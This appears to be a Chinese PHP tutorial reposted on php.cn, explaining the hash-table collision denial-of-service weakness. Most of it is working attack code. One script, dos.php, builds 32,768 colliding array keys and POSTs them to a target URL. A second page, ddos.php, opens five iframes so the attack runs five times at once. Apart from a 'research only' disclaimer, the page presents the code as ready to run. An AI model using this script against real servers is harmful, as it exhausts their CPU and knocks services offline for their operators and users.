PHP利用hash冲突漏洞进行DDoS攻击的方法分析_php技巧

WBOY
Release: 2016-05-16 20:19:13
Original
1224 people have browsed it

本文实例分析了PHP利用hash冲突漏洞进行DDoS攻击的方法。分享给大家供大家参考。具体分析如下:

首先声明:本文内容只用于研究学习使用,请勿用于非法行为!

前面提到过最近爆出的hash表碰撞漏洞,包括java、python、php等在内的很多常用语言均未幸免,今晚咱就来实际看看它的威力。

攻击原理:

通过向目标服务器post一组精心拼凑的数组参数,到达服务端后语言底层处理接收到的数组参数时,由于该漏洞的存在造成CPU的大量消耗,最终导致服务器资源耗尽。
不用什么花哨的手法,就用PHP简单实现下看下效果,点到即止。

文件:dos.php

// 目标地址 
// 只要目标地址存在,不用管它是干嘛的 
$host = 'http://127.0.0.1/test.php';
$data = '';
$size = pow(2, 15);
for ($key=0, $max=($size-1)*$size; $key<=$max; $key+=$size)
{
  $data .= '&array[' . $key . ']=0';
}
$ret = curl($host, ltrim($data,'&')); 
var_dump($ret); 
function curl($url, $post, $timeout = 30){
  $ch = curl_init();
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); 
  curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout - 5);
  curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));
  curl_setopt($ch, CURLOPT_URL, $url);
  curl_setopt($ch, CURLOPT_POST, true);
  curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  $output = curl_exec($ch);
  if ($output === false) return false;
  $info = curl_getinfo($ch);
  $http_code = $info['http_code'];
  if ($http_code == 404) return false;
  curl_close($ch);
  return $output;
}
Copy after login

文件:ddos.php

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 
<html xmlns="http://www.w3.org/1999/xhtml"> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> 
<title>DDOS</title> 
</head> 
<body> 
<&#63;php 
for($i=0; $i<5; $i++){//并发数 
  echo '<iframe src="dos.php&#63;a='.$i.'" scrolling="false" frameborder="1" allowtransparency="true" style="background-color:transparent;"></iframe>'; 
} 
&#63;> 
</body> 
</html>
Copy after login

希望本文所述对大家的php程序设计有所帮助。

source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template